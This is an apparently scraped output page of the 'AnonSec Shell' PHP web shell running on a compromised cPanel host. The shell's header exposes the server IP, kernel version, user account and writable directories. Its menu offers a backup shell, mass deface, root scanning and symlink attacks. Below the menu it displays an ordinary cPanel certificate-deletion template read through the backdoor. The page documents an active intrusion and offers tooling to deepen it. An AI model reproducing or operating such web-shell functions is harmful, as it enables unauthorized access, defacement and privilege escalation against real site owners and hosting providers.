AnonSec Shell
Server IP : 104.21.37.246  /  Your IP : 104.23.243.33   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/2388322/cwd/frontend/jupiter/ssl/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /proc/2388322/cwd/frontend/jupiter/ssl/deletecrt.html.tt
[%
# Set up the page state
SET host = RAW_FORM('id');
SET host_not_set = (host == "");

IF !host_not_set;
    # Delete the certificate
    SET delete_cert = execute('SSL', 'delete_cert', { id=RAW_FORM('id') });
END;

SET failed = delete_cert.status == 0;

SET CPANEL.CPVAR.dprefix = '../';
%]

[% WRAPPER '_assets/master.html.tt'
    app_key = 'ssl_tls'
-%]
<div class="body-content">
    <h2 id="hdrDelete">
        [% locale.maketext('Delete Certificate') %]
    </h2>

    [% IF host_not_set %]
        <div id="noidError" class="alert alert-danger">
            <span id="noidErrorImg" class="glyphicon glyphicon-remove-sign"></span>
            <div id="noidErrorMsg" class="alert-message">
                [% locale.maketext('You did not provide the “[_1]” in the request.', 'id') %]
            </div>
        </div>
    [% ELSIF !failed %]
        <div id="deleteSuccess" class="alert alert-success">
            <span id="deleteSuccessImg" class="glyphicon glyphicon-ok-sign"></span>
            <div id="deleteSuccessMsg" class="alert-message">
                [% locale.maketext('The certificate “[_1]” has been deleted.', FORM.id) %]
            </div>
        </div>
    [% ELSE %]
        <div id="deleteError" class="alert alert-danger">
            <span id="deleteErrorImg" class="glyphicon glyphicon-remove-sign"></span>
            <div id="deleteErrorMsg" class="alert-message">
                [% locale.maketext('Failed to delete the certificate “[_1]”. The certificate may not exist on the server or you do not have permission to access it.',FORM.id) %]
                [% IF delete_cert.errors_as_string %]
                    [% delete_cert.errors_as_string FILTER html %]
                [% END %]
            </div>
        </div>
    [% END %]

    [% INCLUDE _assets/return_link.html.tt return_location='crts.html' return_link_text=locale.maketext('Go Back') %]
</div>
[% END #wrapper %]

Anon7 - 2022
AnonSec Team